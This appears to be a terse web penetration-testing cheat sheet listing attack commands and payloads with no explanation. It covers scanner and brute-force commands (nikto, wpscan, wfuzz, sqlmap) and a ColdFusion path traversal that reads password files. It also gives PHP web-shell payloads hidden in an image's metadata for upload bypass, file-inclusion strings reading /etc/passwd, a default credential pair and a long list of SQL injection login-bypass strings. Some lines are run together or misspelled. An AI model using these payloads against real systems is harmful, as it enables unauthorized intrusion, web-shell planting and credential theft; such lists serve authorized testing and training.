nikto -h 10.10.10.10 –output filename
sslscan 192.168.101.1:443
nmap -sV --script=ssl-heartbleed 192.168.3.157
curl <ip address / dns>
dirb http://10.10.10.1/admin/
wfuzz -w pass.txt -L 20 -d "username=FUZZ&password=FUZZ" -hw 1224 http://login page path
SQLMap
wpscan -u 192.168.3.145 --enumerate -t --enumerate u --enumerate p
wpscan –u ipaddress --username name --wordlist pathtolist
wpscan -u http://cybear32c.lab/ --random-agent
Zoom.py
droopsescan https://github.com/droope/droopescan
/CHANGELOG.txt
to find versionhttp://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
httpd.conf
/ windows config fileshttp://IP:8080/jmxconcole/
shell.php%00.gif
).<? system($_GET['cmd']);//or you can insert your complete shellcode ?>
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg
mv lo.jpg lo.php.jpg
root:pma
wafw00f
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
http://example.com/page=../../../../../../etc/passwd%00
http://example.com/page=../../../../../../etc/passwd?
/etc/hosts /etc/resolv.conf
/etc/passwd%00jpg
nmap -sV --script=http-sql-injection <target>
sqlmap -r request.txt
sqlmap -u http://example.com --crawl=1
‘or 1=1- -
‘ or ‘1’=1
‘ or ‘1’=1 - -
‘–
' or '1'='1
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
admin’ - -
admin’) - -
'